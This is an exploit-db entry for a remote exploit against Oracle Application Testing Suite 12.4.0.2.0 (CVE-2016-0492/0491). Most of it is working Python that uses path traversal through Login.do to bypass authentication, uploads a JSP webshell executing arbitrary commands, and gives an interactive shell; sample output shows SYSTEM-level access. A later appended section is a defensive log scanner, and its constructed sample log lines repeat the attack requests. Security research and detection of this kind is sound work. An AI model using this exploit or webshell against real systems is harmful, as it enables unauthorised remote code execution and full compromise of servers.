Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload

13 Apr 2016 | Reported by Zhou Yu | Type: exploitdb | Source: www.exploit-db.com

Code
# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu <[email protected] >
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
# Version: 12.4.0.2.0
# Tested on: Win7 SP1 32-bit
# CVE : CVE-2016-0492 and CVE-2016-0491

import urllib2
import urllib

ip = '192.168.150.239'
port = 8088

url = "http://" + ip + ":" + str(port)
#bypass authentication
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
request = urllib2.Request(url)

webshell_content='''
<%@ page import="java.util.*,java.io.*"  %>
    <%
        if (request.getParameter("{cmd}") != null) {{
            Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while (disr != null) {{
                out.println(disr);
                disr = dis.readLine();
            }}
        }}
    %>
'''
boundary = "---------------------------7e01e2240a1e"
request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
post_data = "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
post_data = post_data + "\r\n.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
post_data = post_data + "\r\nwebshell.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
post_data = post_data + "\r\n*\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
post_data = post_data + "Content-Type: text/plain\r\n"
post_data = post_data + "\r\n" + webshell_content +"\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
post_data = post_data + "\r\nDefault\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
post_data = post_data + "\r\n.\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
post_data = post_data + "--" + boundary + "--"+"\r\n"

try:
    request.add_data(post_data)
    response = urllib2.urlopen(request)
    if response.code == 200 :
        print "[+]upload done!"
        webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
        print "[+]wait a moment,detecting whether the webshell exists..."
        if urllib2.urlopen(webshellurl).code == 200 :
            print "[+]upload webshell successfully!"
            print "[+]return a cmd shell"
            while True:
                cmd = raw_input(">>: ")
                if cmd == "exit" :
                    break
                print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
        else:
            print "[-]attack fail!"
    else:
        print "[-]attack fail!"
except Exception as e:
    print "[-]attack fail!"

'''
#run the exploit and get a cmd shell
root@kali:~/Desktop# python exploit.py 
[+]upload done!
[+]wait a moment,detecting whether the webshell exists...
[+]upload webshell successfully!
[+]return a cmd shell
>>: whoami
nt authority\system


>>: exit
'''
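Added detection example, written for this entry and not part of the exploit-db submission: it scans web-server access logs for the two request shapes the exploit above depends on, the path-traversal bypass through the unauthenticated /olt/Login.do action and subsequent requests for a JSP under /olt/pages/. The log lines are constructed, and the assumption that JSPs under /olt/pages/ are worth reviewing should be checked against a baseline of the files an unmodified install ships.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not from a real system); only the request part is parsed.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Apr/2016:10:01:02 +0000] "GET /olt/Login.do HTTP/1.1" 200 1532
10.0.0.7 - - [13/Apr/2016:10:01:09 +0000] "POST /olt/Login.do/../../olt/UploadFileUpload.do HTTP/1.1" 200 212
10.0.0.7 - - [13/Apr/2016:10:01:15 +0000] "GET /olt/pages/webshell.jsp?{cmd}=whoami HTTP/1.1" 200 22
10.0.0.9 - - [13/Apr/2016:10:02:00 +0000] "POST /olt/Login.do/..%2F..%2Folt/UploadFileUpload.do HTTP/1.1" 200 212
10.0.0.9 - - [13/Apr/2016:10:02:30 +0000] "POST /olt/UploadFileUpload.do HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def resolve(raw_path):
    """Percent-decode and collapse '.'/'..' segments the way the container will before routing."""
    return posixpath.normpath(unquote(raw_path))

def classify(line):
    """Return finding labels for one access-log line (empty list means nothing notable)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    raw_path = urlsplit(m.group("target")).path
    decoded = unquote(raw_path)
    resolved = resolve(raw_path)
    findings = []
    # 1. Bypass shape: the request names Login.do (reachable without a session) but
    #    carries traversal that resolves to a different, normally protected action.
    if "/login.do/" in decoded.lower() and resolved != decoded:
        findings.append("login-traversal:" + resolved)
    # 2. A JSP served from /olt/pages/, the directory the upload in this entry targets.
    #    Assumption: anything here not present in the install baseline deserves review.
    low = resolved.lower()
    if low.startswith("/olt/pages/") and low.endswith(".jsp"):
        findings.append("jsp-under-pages:" + posixpath.basename(resolved))
    return findings

def scan(log_text):
    """Map each 1-based line number with findings to its list of labels."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

The encoded variant on the fourth sample line is caught because matching happens on the decoded, normalized path rather than on the raw request string.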
